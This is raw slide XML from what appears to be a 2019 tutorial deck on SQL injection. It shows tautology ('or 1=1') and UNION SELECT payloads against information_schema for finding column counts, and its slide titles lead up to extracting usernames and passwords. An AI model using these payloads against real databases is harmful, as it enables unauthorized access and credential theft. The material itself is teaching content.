            <a:ext cx="2708793" cy="4117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7CA34FF-B4EF-41F7-B63E-B21BC23FB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81" y="2538286"/>
            <a:ext cx="6180862" cy="18663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23940A-63F9-4E6A-8522-828D4AE79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78" y="3933895"/>
            <a:ext cx="6187365" cy="70475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D4CE31-B21F-4EBB-BE2D-BE71CF753C73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5666581" y="3123285"/>
            <a:ext cx="4954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SELECT * FROM Users WHERE name = ‘admin’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BC57C7D-9266-4F85-A7F8-5DA881FBEC32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5625173" y="5555235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Return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>: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B4DE736-1842-43C8-9E8B-D784F91F9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46" y="5632174"/>
            <a:ext cx="4663933" cy="2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6FD81-8D34-497F-AE20-4BAA5DBA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A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>First </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>try</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A82026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71F2C3F-9A49-49E8-9F63-1BF71BCCF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36632"/>
            <a:ext cx="4740964" cy="1054686"/>
          </a:xfr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7926419-6A84-491D-B593-DA318605FC4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6488668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Query: SELECT from Users WHERE name = ‘’ or 1=‘1’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CA630C6-F994-4718-8433-4DA1A0201123}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6612837" y="1739317"/>
            <a:ext cx="3197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from Users WHERE True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13C911A-42C4-4219-AEBE-DD9441576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7" y="2552630"/>
            <a:ext cx="3102094" cy="12321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FE83739-DEDA-4D5B-B720-FD3B14A9C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65" y="4646713"/>
            <a:ext cx="4786585" cy="932452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B4723AB-93C4-4722-A1CB-C3609A148DE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579165" y="2363975"/>
            <a:ext cx="1033672" cy="804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A0079-FB16-492B-8A52-11754BB6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olidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t> number of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>columns</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A8202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8047-F5D4-43FB-AD2F-03858B55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418" y="1862207"/>
            <a:ext cx="7951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' union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> union select '1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ADD28E-BE3A-4712-9A90-0CC211267032}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="360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</a:rPr>
              <a:t>Actual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2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Informations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="24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1D622F-C882-4AE3-B494-65901E102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14" y="3596748"/>
            <a:ext cx="7001852" cy="39058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4048DF-6F2B-48EF-A88F-37962B90ED64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6488668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Query: SELECT from Users WHERE name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘’ union select 1 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> union select '1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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013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A0079-FB16-492B-8A52-11754BB6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olidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t> number of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>columns</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A8202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8047-F5D4-43FB-AD2F-03858B55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7" y="1924086"/>
            <a:ext cx="7951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' union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1,1,1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1,1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>'1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ADD28E-BE3A-4712-9A90-0CC211267032}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="3604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</a:rPr>
              <a:t>Actual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2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Informations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="24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Number of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>columns</a:t>
            </a:r>
            <a:endParaRPr lang="it-I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4048DF-6F2B-48EF-A88F-37962B90ED64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6488668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Query: SELECT from Users WHERE name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘' union select 1,1,1 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> union select 1,1, '1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>’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A38A11-F408-487A-BC8B-C62EEC6A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48" y="3924380"/>
            <a:ext cx="2813195" cy="5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A0079-FB16-492B-8A52-11754BB6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A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Understanding return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A82026"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A8202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98047-F5D4-43FB-AD2F-03858B55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7" y="1924086"/>
            <a:ext cx="7951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' union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1,2,3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> union select 1,1, '1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ADD28E-BE3A-4712-9A90-0CC211267032}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="3402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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Actual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2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Informations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="240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Number of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>columns</a:t>
            </a:r>
            <a:endParaRPr lang="it-I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/>
                </a:solidFill>
              </a:rPr>
              <a:t>Value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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4048DF-6F2B-48EF-A88F-37962B90ED64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6488668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Query: SELECT from Users WHERE name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘' union select 1,2,3 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> union select 1,1, '1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>’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FBDC85-462E-49EE-80F2-4AE959EDB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91" y="3862503"/>
            <a:ext cx="2754082" cy="8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3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702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SQL Injection</vt:lpstr>
      <vt:lpstr>What is SQL?</vt:lpstr>
      <vt:lpstr>Which commands will we see</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Starting!</vt:lpstr>
      <vt:lpstr>First try</vt:lpstr>
      <vt:lpstr>Find number of columns</vt:lpstr>
      <vt:lpstr>Find number of columns</vt:lpstr>
      <vt:lpstr>Understanding return value</vt:lpstr>
      <vt:lpstr>Discover Database Name</vt:lpstr>
      <vt:lpstr>Discover Table Name</vt:lpstr>
      <vt:lpstr>Discover Columns Name</vt:lpstr>
      <vt:lpstr>Discover Names:Passwords</vt:lpstr>
      <vt:lpstr>WIN!!</vt:lpstr>
      <vt:lpstr>Try alone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Edoardo Predieri</dc:creator>
  <cp:lastModifiedBy>Edoardo Predieri</cp:lastModifiedBy>
  <cp:revision>19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-02-19T13:16:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-02-19T22:49:19Z</dcterms:modified>
</cp:coreProperties>
</file>